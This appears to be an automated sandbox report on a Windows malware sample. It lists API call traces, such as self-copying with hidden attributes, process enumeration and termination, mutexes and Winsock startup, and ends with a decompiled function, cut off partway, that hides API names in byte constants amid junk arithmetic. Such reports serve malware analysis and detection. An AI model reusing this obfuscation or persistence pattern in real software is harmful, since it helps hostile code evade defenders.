0x003837b5
0x003837b7
0x003837bc
0x003837bf
0x003837c1
0x00383833
0x00383833
0x0038383c
0x0038383c
0x00383842
0x00383848
0x0038384d
0x0038384e
0x00383854
0x00383857
0x0038385c
0x00383862
0x00383865
0x00383868
0x0038386b
0x0038386e
0x00383874
0x00383879
0x0038387c
0x0038387f
0x00383881
0x00383884
0x00383886
0x00383889
0x0038388b
0x00383892
0x0038389b
0x0038389b
0x0038389d
0x003838a0
0x003838a3
0x003838a3
0x003838ab
0x00000000
0x003838ab
0x003837cf
0x003837d3
0x003837d8
0x003837de
0x003837e4
0x003837ed
0x003837f0
0x003837f6
0x003837f8
0x00383801
0x00383804
0x00383807
0x0038380d
0x00383813
0x00383815
0x00383817
0x0038381d
0x00383823
0x00383828
0x0038382b
0x0038382d
0x00000000
0x00000000
0x0038382f
0x00000000
0x0038382f
0x00383753
0x00383755
0x00000000
0x00000000
0x00000000
0x00383755
0x003839dc
0x003839df
0x003839e9
0x003839fb
0x003839fd
0x00383a11
0x00383a13
0x00383a13
0x00383a16
0x00383a18
0x00383a1b
0x00383a1b
0x00383a20
0x00383a20
0x00383a22
0x00383a23
0x00383a23
0x00383a29
0x00383a29
0x00383a34
0x00383a36
0x00383a3c
0x00383a3f
0x00383a42
0x00383a4b
0x00383a59
0x00383a5e
0x00383a63
0x00383a68
0x00000000
0x00383a68
0x0038341c
0x00383421
0x00383424
0x00383427
0x00383438
0x0038343d
0x00383443
0x00383447
0x0038344e
0x00383468
0x0038346a
0x0038346f
0x00383472
0x00383474
0x00000000
0x00000000
0x00000000
0x003832bc
0x003832c6
0x003832cb
0x003832d2
0x003832d8
0x003832dc
0x003832e3
0x003832e9
0x003832f3
0x003832f6
0x003832f9
0x00383302
0x0038330b
0x00383314
0x00383317
0x00383322
0x00383324
0x00383327
0x00383330
0x00383330
0x00383332
0x00383333
0x00383337
0x0038333f
0x00383341
0x00383342
0x00383342
0x00383345
0x00383346
0x0038334c
0x0038334f
0x00383359
0x0038335b
0x00383360
0x00383363
0x00000000
0x00383363

APIs

_malloc.LIBCMT ref: 00381554
_memset.LIBCMT ref: 003815B6

Part of subcall function 0038CF90: _malloc.LIBCMT ref: 0038CFC7

GetProcAddress.KERNEL32(74CA0000,00000000), ref: 003816D2

Part of subcall function 00396570: _memset.LIBCMT ref: 00396593
Part of subcall function 00396570: _free.LIBCMT ref: 00396599

GetProcAddress.KERNEL32(74CA0000,00000000), ref: 003816FA
GetProcAddress.KERNEL32(74CA0000,00000000), ref: 00381722
GetProcAddress.KERNEL32(74CA0000,00000000), ref: 00381753
GetProcAddress.KERNEL32(74CA0000,00000000), ref: 0038177B
GetProcAddress.KERNEL32(74CA0000,00000000), ref: 003817C4
GetProcAddress.KERNEL32(74CA0000,00000000), ref: 003817EC
GetProcAddress.KERNEL32(74CA0000,00000000), ref: 0038183D
GetProcAddress.KERNEL32(74CA0000,00000000), ref: 00381883
GetProcAddress.KERNEL32(74CA0000,00000000), ref: 003818AA
GetProcAddress.KERNEL32(74CA0000,00000000), ref: 003818D2
GetProcAddress.KERNEL32(74CA0000,00000000), ref: 00381920
GetProcAddress.KERNEL32(74CA0000,00000000), ref: 00381948
GetProcAddress.KERNEL32(74CA0000,00000000), ref: 0038196F
GetProcAddress.KERNEL32(74CA0000,00000000), ref: 00381997
GetProcAddress.KERNEL32(74CA0000,00000000), ref: 003819BF
GetProcAddress.KERNEL32(74CA0000,00000000), ref: 00381A0A
GetProcAddress.KERNEL32(74CA0000,00000000), ref: 00381A32
GetProcAddress.KERNEL32(74CA0000,00000000), ref: 00381A5A
GetProcAddress.KERNEL32(74CA0000,00000000), ref: 00381A99
GetProcAddress.KERNEL32(74CA0000,00000000), ref: 00381AC1
GetProcAddress.KERNEL32(74CA0000,00000000), ref: 00381AE9
GetProcAddress.KERNEL32(74CA0000,00000000), ref: 00381B33
GetProcAddress.KERNEL32(74CA0000,00000000), ref: 00381B5A
GetProcAddress.KERNEL32(74CA0000,00000000), ref: 00381BA3
GetProcAddress.KERNEL32(74CA0000,00000000), ref: 00381BCA
GetProcAddress.KERNEL32(74CA0000,00000000), ref: 00381C3E
GetProcAddress.KERNEL32(74CA0000,00000000), ref: 00381C86
GetProcAddress.KERNEL32(74CA0000,00000000), ref: 00381CCD
GetProcAddress.KERNEL32(74CA0000,00000000), ref: 00381CF5
GetProcAddress.KERNEL32(74CA0000,00000000), ref: 00381D1D
GetProcAddress.KERNEL32(74CA0000,00000000), ref: 00381D78
GetProcAddress.KERNEL32(74CA0000,00000000), ref: 00381DA0
GetProcAddress.KERNEL32(74CA0000,00000000), ref: 00381DC8
GetProcAddress.KERNEL32(74CA0000,00000000), ref: 00381E0C
GetProcAddress.KERNEL32(74CA0000,00000000), ref: 00381E34
GetProcAddress.KERNEL32(74CA0000,00000000), ref: 00381E5C
GetProcAddress.KERNEL32(74CA0000,00000000), ref: 00381ED0
GetProcAddress.KERNEL32(74CA0000,00000000), ref: 00381F0A
GetProcAddress.KERNEL32(74CA0000,00000000), ref: 00381F32
GetProcAddress.KERNEL32(74CA0000,00000000), ref: 00381F59
GetProcAddress.KERNEL32(74CA0000,00000000), ref: 00381F81
GetProcAddress.KERNEL32(74CA0000,00000000), ref: 00381FA9
GetProcAddress.KERNEL32(74CA0000,00000000), ref: 00381FD0
GetProcAddress.KERNEL32(74CA0000,00000000), ref: 00381FF8
GetProcAddress.KERNEL32(74CA0000,00000000), ref: 00382023
GetProcAddress.KERNEL32(74CA0000,00000000), ref: 0038209D
GetProcAddress.KERNEL32(74CA0000,00000000), ref: 003820C5
GetProcAddress.KERNEL32(74CA0000,00000000), ref: 00382122
GetProcAddress.KERNEL32(74CA0000,00000000), ref: 0038214A
GetProcAddress.KERNEL32(74CA0000,00000000), ref: 003821A0
GetProcAddress.KERNEL32(74CA0000,00000000), ref: 003821C8
GetProcAddress.KERNEL32(74CA0000,00000000), ref: 003821EF
GetProcAddress.KERNEL32(74CA0000,00000000), ref: 0038222B
GetProcAddress.KERNEL32(74CA0000,00000000), ref: 00382252
GetProcAddress.KERNEL32(74CA0000,00000000), ref: 0038227A
GetProcAddress.KERNEL32(74CA0000,00000000), ref: 003822A2
GetProcAddress.KERNEL32(74CA0000,00000000), ref: 003822C9
GetProcAddress.KERNEL32(74CA0000,00000000), ref: 003822F1
LoadLibraryA.KERNELBASE(00000000), ref: 00382312
LoadLibraryA.KERNEL32(00000000), ref: 0038236A
GetProcAddress.KERNEL32(74160000,00000000), ref: 003823C2
GetProcAddress.KERNEL32(74160000,00000000), ref: 003823F3
GetProcAddress.KERNEL32(74160000,00000000), ref: 0038241B
GetProcAddress.KERNEL32(74160000,00000000), ref: 00382443
GetProcAddress.KERNEL32(74160000,00000000), ref: 0038246A
GetProcAddress.KERNEL32(74160000,00000000), ref: 00382495
GetProcAddress.KERNEL32(74160000,00000000), ref: 00382592
GetProcAddress.KERNEL32(74160000,00000000), ref: 00382600
GetProcAddress.KERNEL32(74160000,00000000), ref: 0038266A
GetProcAddress.KERNEL32(74160000,00000000), ref: 003826A4
GetProcAddress.KERNEL32(74160000,00000000), ref: 003826CC
GetProcAddress.KERNEL32(74160000,00000000), ref: 00382705
GetProcAddress.KERNEL32(74160000,00000000), ref: 00382783
GetProcAddress.KERNEL32(74160000,00000000), ref: 003827AB
GetProcAddress.KERNEL32(74160000,00000000), ref: 003827D2
GetProcAddress.KERNEL32(74160000,00000000), ref: 003827FA
GetProcAddress.KERNEL32(74160000,00000000), ref: 00382834
LoadLibraryA.KERNELBASE(00000000), ref: 00382901
GetProcAddress.KERNEL32(76A00000,00000000), ref: 0038293E
GetProcAddress.KERNEL32(76A00000,00000000), ref: 00382996
GetProcAddress.KERNEL32(76A00000,00000000), ref: 003829BE
GetProcAddress.KERNEL32(76A00000,00000000), ref: 00382A73
GetProcAddress.KERNEL32(76A00000,00000000), ref: 00382A9B
GetProcAddress.KERNEL32(76A00000,00000000), ref: 00382AC3
GetProcAddress.KERNEL32(76A00000,00000000), ref: 00382C33
GetProcAddress.KERNEL32(76A00000,00000000), ref: 00382C5B
GetProcAddress.KERNEL32(76A00000,00000000), ref: 00382C83
GetProcAddress.KERNEL32(76A00000,00000000), ref: 00382CD5
GetProcAddress.KERNEL32(76A00000,00000000), ref: 00382CFC
GetProcAddress.KERNEL32(76A00000,00000000), ref: 00382D24
GetProcAddress.KERNEL32(76A00000,00000000), ref: 00382E06
GetProcAddress.KERNEL32(76A00000,00000000), ref: 00382E2E
GetProcAddress.KERNEL32(76A00000,00000000), ref: 00382E56
GetProcAddress.KERNEL32(76A00000,00000000), ref: 00382E7D
GetProcAddress.KERNEL32(76A00000,00000000), ref: 00382F28
GetProcAddress.KERNEL32(76A00000,00000000), ref: 00382F4F
GetProcAddress.KERNEL32(76A00000,00000000), ref: 00382F83
GetProcAddress.KERNEL32(76A00000,00000000), ref: 00382FAA
GetProcAddress.KERNEL32(76A00000,00000000), ref: 00382FD2
GetProcAddress.KERNEL32(76A00000,00000000), ref: 00382FFA
GetProcAddress.KERNEL32(76A00000,00000000), ref: 003830F2
GetProcAddress.KERNEL32(76A00000,00000000), ref: 00383119
GetProcAddress.KERNEL32(76A00000,00000000), ref: 00383141
GetEnvironmentVariableA.KERNEL32(00000000,C:\Users\user,00000104), ref: 00383199
CreateMutexA.KERNELBASE(00000000,00000000,00000000), ref: 003831B0
CreateMutexA.KERNELBASE(00000000,00000000,00000000), ref: 003831CC
CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 0038324D
GetTickCount.KERNEL32 ref: 003832BF
__itow.LIBCMT ref: 003832C6
GetCommandLineA.KERNEL32 ref: 00383398
__stat64i32.LIBCMT ref: 003835D5
Sleep.KERNEL32(00000D05,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 003835E6
__stat64i32.LIBCMT ref: 003835F7
Sleep.KERNEL32(000007D0), ref: 00383728
__stat64i32.LIBCMT ref: 00383739
GetModuleFileNameA.KERNEL32(00000000,?,00000200), ref: 00383769
SetFileAttributesA.KERNEL32(74CB4EE1,00000080), ref: 00383775
CopyFileA.KERNEL32(?,74CB4EE1,00000000), ref: 00383797
GetCommandLineA.KERNEL32(00000000), ref: 003838B0
GetModuleFileNameA.KERNEL32(00000000,?,00000200), ref: 003838E5
LoadLibraryA.KERNEL32(00000000), ref: 003839CF
GetProcAddress.KERNEL32(?,00000000), ref: 003839F6
MessageBoxA.USER32(00000000,00000004,?), ref: 00383A34
WSAStartup.WS2_32(00000202,?), ref: 00383BA4
CloseHandle.KERNEL32(00000000), ref: 00383C80
SetFileAttributesA.KERNEL32(?,00000080), ref: 00383C92
CopyFileA.KERNEL32(?,?,00000000), ref: 00383CA8
SetFileAttributesA.KERNEL32(?,00000002), ref: 00383CBB
Sleep.KERNEL32(000007D0), ref: 00383D79
SetFileAttributesA.KERNEL32(003CFCA0,00000080), ref: 00383D8F
CopyFileA.KERNEL32(?,003CFCA0,00000000), ref: 00383DA3
SetFileAttributesA.KERNEL32(003CFCA0,00000002), ref: 00383DB0
__snprintf.LIBCMT ref: 00383ED1
Sleep.KERNEL32(000003E8), ref: 00383CFF

Part of subcall function 00386260: _memset.LIBCMT ref: 003862B1
Part of subcall function 00386260: CreateProcessA.KERNELBASE(?,00000008,00000000,00000000,00000000,00000008,00000000,00000000,?,0000159F), ref: 003862EC
Part of subcall function 00386260: CloseHandle.KERNEL32(0000001F), ref: 003862FA
Part of subcall function 00386260: CloseHandle.KERNEL32(0000159F), ref: 00386304

Part of subcall function 0038F090: WaitForSingleObject.KERNEL32(?,00004E20,00000000,00000000,?,181DD011,?,00000000), ref: 0038F0DD

Part of subcall function 0039DF62: _doexit.LIBCMT ref: 0039DF6E

SetFileAttributesA.KERNEL32(74CB4EE1,00000080), ref: 0038384E

Part of subcall function 003896D0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0038974D
Part of subcall function 003896D0: Process32First.KERNEL32(00000000,?), ref: 0038976F
Part of subcall function 003896D0: OpenProcess.KERNEL32(00000001,?,?,00000000), ref: 003897F3
Part of subcall function 003896D0: TerminateProcess.KERNEL32(00000000,000000FF), ref: 00389827
Part of subcall function 003896D0: CloseHandle.KERNEL32(00000000), ref: 0038982E
Part of subcall function 003896D0: Process32Next.KERNEL32(00000000,00000128), ref: 00389885

Sleep.KERNEL32(000003E8,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0038367B

Part of subcall function 00392E30: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00392EEF
Part of subcall function 00392E30: Process32First.KERNEL32(00000000,?), ref: 00392F37

_memset.LIBCMT ref: 00383F06
_memset.LIBCMT ref: 00383F19
CreateThread.KERNEL32 ref: 00383F30
Sleep.KERNEL32(0000C350), ref: 00383F75

Strings

C:\Users\user, xrefs: 0038317D
7i\, xrefs: 00381C18, 00381C21
Hl, xrefs: 00381E80, 00382B41, 00382BEC

Memory Dump Source

Source File: 00000000.00000002.376906560.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true

Associated: 00000000.00000002.376889166.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377032903.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377073242.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377090053.00000000003D3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_380000_zGIDlWIotR.jbxd

Similarity

API ID: AddressProc$File$Create$AttributesSleep$_memset$CloseHandleLibraryLoad$CopyMutexProcessProcess32__stat64i32$CommandFirstLineModuleNameSnapshotToolhelp32_malloc$CountEnvironmentMessageNextObjectOpenSingleStartupTerminateThreadTickVariableWait__itow__snprintf_doexit_free
String ID: 7i\$C:\Users\user$Hl
API String ID: 1431264327-613304264
Opcode ID: b5e1a44da65aaf250fdb1766fa4cc7f3b30b219c7e98ea5bf6c477e68d459da6
Instruction ID: f522404d911ac8ccd7e77a57835936ee3deaa0fd6de98ee05c008b0fdbf7e8cb
Opcode Fuzzy Hash: b5e1a44da65aaf250fdb1766fa4cc7f3b30b219c7e98ea5bf6c477e68d459da6
Instruction Fuzzy Hash: 8C43F270D01304EBEB16AF61FC8AF6A3B7CFB85B40F014855F540AB2A5EB75A924CB54

Uniqueness

Uniqueness Score: -1.00%

Function 00387210 Relevance: 63.2, APIs: 13, Strings: 22, Instructions: 1960
libraryloaderthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 71%

			E00387210(signed int __ebx, void* __edi, void* __esi) {
				signed char _v8;
				long long _v12;
				intOrPtr _v16;
				signed int _v20;
				signed int _v28;
				signed int _v32;
				long long _v36;
				signed long long _v44;
				intOrPtr _v50;
				char _v52;
				short _v57;
				char _v58;
				short _v60;
				char _v64;
				char _v65;
				short _v67;
				char _v68;
				intOrPtr _v72;
				char _v76;
				short _v81;
				intOrPtr _v85;
				short _v87;
				intOrPtr _v91;
				char _v92;
				short _v97;
				intOrPtr _v101;
				short _v103;
				char _v104;
				char _v108;
				char _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				char _v124;
				char _v125;
				short _v127;
				char _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				char _v144;
				signed int _t410;
				signed int _t413;
				struct HINSTANCE__* _t419;
				signed char _t421;
				_Unknown_base(*)()* _t422;
				intOrPtr _t423;
				signed char _t427;
				signed short _t429;
				signed char _t436;
				signed char _t437;
				signed char _t439;
				short _t440;
				_Unknown_base(*)()* _t442;
				signed char _t445;
				signed char _t446;
				signed char _t448;
				struct HINSTANCE__* _t457;
				_Unknown_base(*)()* _t458;
				signed char _t462;
				signed char _t463;
				signed char _t465;
				signed char _t473;
				signed char _t476;
				signed char _t477;
				intOrPtr _t479;
				signed int _t484;
				signed char _t487;
				signed short _t488;
				intOrPtr _t494;
				signed char _t496;
				intOrPtr _t497;
				signed char _t498;
				signed short _t507;
				signed char _t511;
				signed char _t513;
				signed short _t515;
				signed char _t517;
				signed int _t518;
				signed char _t519;
				signed char _t522;
				signed char _t525;
				signed short _t526;
				signed char _t527;
				signed short _t535;
				signed char _t536;
				signed char _t538;
				signed char _t541;
				signed char _t542;
				short _t543;
				signed char _t548;
				intOrPtr _t550;
				signed char _t567;
				signed char _t569;
				signed char _t571;
				signed char _t572;
				signed char _t575;
				signed char _t579;
				signed char _t581;
				signed char _t586;
				intOrPtr _t587;
				signed char _t589;
				void* _t590;
				signed char _t592;
				signed char _t593;
				signed char _t597;
				void* _t599;
				signed char _t600;
				signed char _t603;
				intOrPtr _t609;
				intOrPtr _t619;
				signed int _t621;
				signed int _t622;
				signed int _t624;
				intOrPtr _t626;
				struct HINSTANCE__* _t628;
				signed int _t630;
				signed char _t632;
				signed char _t634;
				signed char _t639;
				struct HINSTANCE__* _t640;
				signed char _t642;
				signed char _t643;
				struct HINSTANCE__* _t644;
				intOrPtr _t648;
				signed int _t650;
				intOrPtr _t652;
				signed char _t657;
				signed short _t658;
				signed char _t659;
				signed short _t660;
				intOrPtr _t661;
				intOrPtr _t663;
				signed char _t665;
				signed char _t667;
				signed short _t671;
				signed int _t672;
				intOrPtr _t674;
				intOrPtr _t675;
				intOrPtr _t677;
				signed char _t680;
				signed int _t684;
				signed long long _t686;
				signed char _t688;
				signed char _t691;
				signed char _t692;
				signed char _t696;
				signed int _t697;
				signed char _t699;
				intOrPtr _t700;
				signed char _t702;
				intOrPtr _t704;
				signed short _t706;
				intOrPtr _t708;
				intOrPtr _t709;
				signed int _t710;
				signed int _t712;
				signed char _t714;
				signed char _t716;
				signed int _t717;
				intOrPtr _t719;
				signed long long _t721;
				intOrPtr _t724;
				signed int _t725;
				signed char _t727;
				signed short _t729;
				signed int _t730;
				signed char _t735;
				intOrPtr _t743;
				signed int _t744;
				signed short _t746;
				signed char _t748;
				intOrPtr _t749;
				signed int _t751;
				signed char _t753;
				signed short _t754;
				intOrPtr _t755;
				signed char _t756;
				signed int _t757;
				signed int _t759;
				signed int _t761;
				struct HINSTANCE__* _t765;
				signed short _t766;
				intOrPtr _t770;
				intOrPtr _t771;
				struct HINSTANCE__* _t772;
				signed short _t774;
				signed char _t775;
				signed char _t778;
				intOrPtr _t782;
				signed char _t788;
				intOrPtr _t789;
				intOrPtr _t790;
				intOrPtr _t794;
				signed char _t797;
				signed char _t798;
				signed short _t800;
				intOrPtr _t801;
				intOrPtr _t805;
				intOrPtr _t807;
				intOrPtr _t809;
				signed char _t811;
				intOrPtr _t812;
				signed char _t813;
				signed char _t817;
				signed char _t819;
				intOrPtr _t821;
				signed char _t824;
				signed char _t829;
				signed char _t830;
				signed char _t832;
				intOrPtr _t834;
				signed short _t835;
				signed char _t841;
				signed char _t842;
				intOrPtr _t843;
				signed char _t844;
				intOrPtr _t845;
				intOrPtr _t848;
				signed char _t849;
				signed char _t854;
				intOrPtr _t855;
				signed int _t861;
				signed char _t863;
				short _t866;
				signed char _t868;
				signed char _t869;
				signed short _t871;
				signed char _t872;
				signed char _t873;
				intOrPtr _t874;
				intOrPtr _t875;
				signed int _t876;
				void* _t879;
				void* _t880;
				signed short* _t881;
				signed int _t928;
				signed int _t932;
				signed long long _t941;
				signed long long _t957;
				signed int _t965;
				signed int _t966;
				long long _t975;
				signed int _t976;
				signed int _t993;
				signed int _t996;
				signed int _t1001;
				signed char _t1003;
				long long _t1004;
				signed int _t1005;
				signed int _t1009;
				long long _t1015;
				signed long long _t1016;
				signed char _t1022;
				signed int _t1025;
				signed int _t1043;
				signed long long _t1055;
				signed int _t1056;
				signed int _t1058;
				signed long long _t1071;
				signed int _t1088;
				signed long long _t1090;
				signed int _t1103;
				signed int _t1125;
				signed long long _t1126;
				signed long long _t1134;
				signed int _t1136;
				signed int _t1149;
				signed long long _t1158;
				signed int _t1178;
				signed long long _t1185;
				signed long long _t1197;
				signed int _t1200;
				signed long long _t1204;
				signed int _t1227;
				signed int _t1229;
				signed int _t1257;
				signed long long _t1270;
				signed long long _t1273;
				signed long long _t1287;
				signed int _t1293;
				signed long long _t1297;
				signed int _t1300;
				signed long long _t1304;
				signed int _t1307;
				long long _t1312;
				intOrPtr _t1320;
				signed long long _t1322;
				signed long long _t1326;
				signed int _t1327;
				long long _t1331;
				signed int _t1333;
				signed int _t1335;
				signed long long _t1336;
				signed long long _t1339;
				signed int _t1362;
				signed int _t1367;
				signed int _t1376;
				signed int _t1388;

				_t621 = __ebx;
				_push(__ebx);
				_t410 =  *0x3ce2fc; // 0x3a84af9e
				_t624 =  *0x3ce350; // 0xdea3a412
				 *0x3ce350 = _t410 * _t624;
				_v20 =  *0x3ce1e4;
				_v128 = 0x65;
				asm("fsubr qword [0x3c85c8]");
				_v104 = 0x65;
				_v112 = 0;
				_v57 = 0x74;
				asm("fsubr qword [ebp-0x10]");
				_v67 = 0x656c;
				_v127 = 0x7463;
				_v58 = 0x6e;
				 *0x3ce1e4 =  *0x3ce4e0;
				_v140 = 0x53726f46;
				_v76 = 0x736f6c43;
				_t928 =  *0x3ce110 +  *0x3c75c8;
				_v64 = 0x45746553;
				_v136 = 0x6c676e69;
				_v101 = 0x6c642e32;
				_v116 = 0x64616572;
				_v85 = 0x746e6576;
				_v103 = 0x336c;
				_v91 = 0x74616572;
				_v132 = 0x6a624f65;
				_v125 = 0;
				_v50 = 0x706565;
				_v60 = 0x6576;
				_v52 = 0x6c53;
				_v120 = 0x68546574;
				_v87 = 0x4565;
				_v108 = 0x6e72654b;
				_v97 = 0x6c;
				_v72 = 0x6e614865;
				_v144 = 0x74696157;
				_v124 = 0x61657243;
				_v81 = 0x41;
				_v92 = 0x43;
				_v68 = 0x64;
				_v65 = 0;
				 *0x3ce110 = _t928;
				_t757 =  *0x3ce1d0; // 0x2f751c97
				_v32 = _t757 - 0x5851c7f0;
				asm("fild dword [ebp-0x1c]");
				_v20 = _t928;
				_t413 =  *0x3ce5dc; // 0x12a4
				_v32 = _t413;
				_v20 =  *0x3ce110 + _v20;
				asm("fild dword [ebp-0x1c]");
				 *0x3ce5dc = E0039CABC();
				_t932 =  *0x3ce150;
				_t759 =  *0x3ce4d4; // 0x84901a2a
				_v20 = _t932;
				_v32 = _t759;
				asm("fild dword [ebp-0x1c]");
				asm("fsubr qword [ebp-0x10]");
				 *0x3ce15c = _t932;
				 *0x3ce0b4 =  *0x3ce0b4 *  *0x3c85c4;
				_t626 =  *0x3ce3e8; // 0x80000000
				 *0x3ce0c4 =  *0x3ce0c4 + 0x9deb6587 - _t626;
				_v20 =  *0x3ce4f8;
				_v20 =  *0x3ce560 + _v20;
				asm("fsubr qword [ebp-0x10]");
				_v20 =  *0x3ce0d8;
				_v32 =  *0x3ce290 & 0x0000ffff;
				asm("fild dword [ebp-0x1c]");
				 *0x3ce290 = E0039CABC();
				asm("fld1");
				_t48 =  &_v108; // 0x6e72654b
				_t941 = st0;
				asm("fsubp st2, st0");
				asm("fxch st0, st1");
				 *0x3ce0d8 = _t941;
				 *0x3ce4f8 = _t941 +  *0x3ce4f8;
				_t419 = GetModuleHandleA(_t48);
				_t761 =  *0x3ce594; // 0x80000001
				 *0x3cfc6c = _t419;
				_t628 =  *0x3cfc6c; // 0x74ca0000
				_t49 =  &_v92; // 0x43
				 *0x3ce594 = _t761 * 0x569b7190;
				_t421 = GetProcAddress(_t628, _t49);
				 *0x3cfc90 = _t421;
				 *0x3ce0bc = ( *0x3ce0bc & 0x0000ffff) - 0x1532122a;
				 *0x3ce058 =  *0x3ce058 +  *0x3c75c8;
				_v12 =  *0x3ce078;
				_v20 =  *0x3c85c0 -  *0x3ce3b8;
				asm("fsubr qword [ebp-0x10]");
				asm("fsubr qword [ebp-0x8]");
				 *0x3ce078 =  *0x3ce058;
				asm("fld1");
				asm("fsubp st1, st0");
				asm("fucompp");
				asm("fnstsw ax");
				if((_t421 & 0x00000044) != 0) {
					_v20 =  *0x3ce344;
					 *0x3ce568 =  *0x3ce568 * _v20;
				} else {
					_t1388 =  *0x3ce0f4;
					_t619 =  *0x3ce4d0; // 0x6c745516
					_v20 = _t1388;
					_v32 = _t619 + 0x2d8f8990;
					asm("fild dword [ebp-0x1c]");
					asm("fsubr qword [ebp-0x10]");
					 *0x3ce0f4 = _t1388;
					 *0x3ce4d0 =  *0x3ce4d0 + 1;
				}
				_t765 =  *0x3cfc6c; // 0x74ca0000
				_t58 =  &_v124; // 0x61657243
				_t422 = GetProcAddress(_t765, _t58);
				_v20 =  *0x3ce07c;
				 *0x3cfc88 = _t422;
				_t957 =  *0x3ce5f0 * _v20;
				 *0x3ce5f0 = _t957;
				_t423 =  *0x3ce340; // 0x1a63
				_t630 =  *0x3ce350; // 0xdea3a412
				_v32 = _t630 + _t423 + 0xd7ed7ead;
				asm("fild dword [ebp-0x1c]");
				 *0x3ce0a4 = _t957;
				_t766 =  *0x3ce0bc; // 0xdec
				_t427 = _t766 - 0x38c155fe;
				if(_t427 != 0x8f287cd0) {
					_v20 =  *0x3ce4c8 -  *0x3c85b0;
					asm("fcomp qword [ebp-0x10]");
					asm("fnstsw ax");
					 *0x3ce2b8 =  *0x3ce2b8 +  *0x3c75c8;
					if((_t427 & 0x00000001) == 0) {
						 *0x3ce2d8 = ( *0x3ce2d8 & 0x0000ffff) + 0x14cf0cb9;
					}
				} else {
					asm("fld1");
					asm("faddp st1, st0");
					_t756 =  *0x3ce2e8; // 0xff800000
					_t876 =  *0x3ce0e8; // 0xe89a10bc
					_v32 = _t876;
					asm("fild dword [ebp-0x1c]");
					_v8 = _t756;
					 *0x3ce0e8 = E0039CABC();
				}
				_t632 =  *0x3ce17c; // 0xb2a9
				_v8 = _t632;
				_t965 =  *0x3ce394 -  *0x3c85a8 +  *0x3c85a4;
				_v20 = _t965;
				asm("fild dword [ebp-0x4]");
				_t966 = _t965 + _v20;
				 *0x3ce17c = E0039CABC();
				_t429 =  *0x3ce598; // 0xc37b
				_t634 =  *0x3ce2ec; // 0x76d570f4
				_t622 = _t621 | 0xffffffff;
				 *0x3ce598 =  *0x3ce598 + _t622;
				 *0x3ce2ec =  *0x3ce2ec + _t622;
				if(( *0x3ce4c4 & 0x0000ffff) - _t429 + _t634 >= ( *0x3ce1e8 & 0x0000ffff) + 0x4457a804) {
					_t770 =  *0x3ce44c; // 0x2575
					_t771 =  *0x3ce38c; // 0x93fc1fee
					 *0x3ce574 =  *0x3ce574 + 0xc2233ff5 - _t770 + _t771;
					 *0x3ce44c =  *0x3ce44c + _t622;
				} else {
					_t875 =  *0x3ce334; // 0xc334
					_t755 =  *0x3ce3e8; // 0x80000000
					 *0x3ce334 = _t875 - _t755 - 0x26896fb8;
				}
				_t436 =  *0x3ce208; // 0x58849b0
				_v8 = _t436;
				asm("fild dword [ebp-0x4]");
				_v20 = _t966;
				asm("fsubr qword [ebp-0x10]");
				_t437 = E0039CABC();
				_t772 =  *0x3cfc6c; // 0x74ca0000
				_t73 =  &_v64; // 0x45746553
				 *0x3ce208 = _t437;
				 *0x3d0438 = GetProcAddress(_t772, _t73);
				_t439 =  *0x3ce368; // 0x80000000
				_v8 = _t439;
				asm("fild dword [ebp-0x4]");
				asm("fsubp st1, st0");
				 *0x3ce584 =  *0x3ce3f8 -  *0x3c8598;
				 *0x3ce368 =  *0x3ce368 + 1;
				asm("fld1");
				asm("fxch st0, st1");
				 *0x3ce3f8 =  *0x3ce3f8 - st0;
				 *0x3ce1a4 = 0xce95bf56;
				_t975 =  *0x3ce420 +  *0x3c8590 -  *0x3c8588;
				 *0x3ce468 = _t975;
				asm("fsubr qword [0x3ce420]");
				 *0x3ce420 = _t975;
				_t976 =  *0x3ce190;
				asm("fld1");
				asm("faddp st1, st0");
				 *0x3ce190 = _t976;
				_t639 =  *0x3ce028; // 0x781d
				_v8 = _t639;
				asm("fild dword [ebp-0x4]");
				_v20 = _t976;
				asm("fsubr qword [ebp-0x10]");
				_t440 = E0039CABC();
				_t640 =  *0x3cfc6c; // 0x74ca0000
				 *0x3ce028 = _t440;
				_t77 =  &_v144; // 0x74696157
				_t442 = GetProcAddress(_t640, _t77);
				_t774 =  *0x3ce128; // 0x206a
				 *0x3d04e4 = _t442;
				 *0x3ce128 =  *0x3ce128 + 1;
				if(_t774 + 0x549910d5 == 0x8eb1ee46) {
					_t445 =  *0x3ce17c; // 0xb2a9
					_v8 = _t445;
					_v20 =  *0x3ce4b0 -  *0x3c8578;
					asm("fild dword [ebp-0x4]");
					_t446 = E0039CABC();
					 *0x3ce17c = _t446;
				} else {
					_t754 =  *0x3ce10c; // 0x3ef8
					_t874 =  *0x3ce0c4; // 0x5bc0e411
					_t446 = _t754 - _t874 + 0x277efece;
					 *0x3ce10c = _t446;
					 *0x3ce0c4 =  *0x3ce0c4 + 1;
				}
				_v20 =  *0x3ce3c8 -  *0x3ce2a4;
				asm("fsubp st1, st0");
				 *0x3ce5b8 =  *0x3ce068 + _v20;
				asm("fld1");
				asm("fxch st0, st1");
				 *0x3ce068 =  *0x3ce068 - st0;
				asm("fld1");
				asm("fsubp st2, st0");
				asm("fxch st0, st1");
				 *0x3ce2a4 = st0;
				_t775 =  *0x3ce280; // 0xa4969772
				 *0x3ce280 =  *0x3ce280 + 1;
				_v8 = _t775 - 0x2feb6c5f;
				_v20 =  *0x3ce054 -  *0x3c8570;
				asm("fild dword [ebp-0x4]");
				_t993 = _v20;
				asm("fucompp");
				asm("fnstsw ax");
				if((_t446 & 0x00000044) != 0) {
					st1 = _t993;
					_v20 =  *0x3ce2b4;
					_t996 =  *0x3ce278 + _v20;
					 *0x3ce278 = _t996;
				} else {
					asm("fsubrp st2, st0");
					asm("fxch st0, st1");
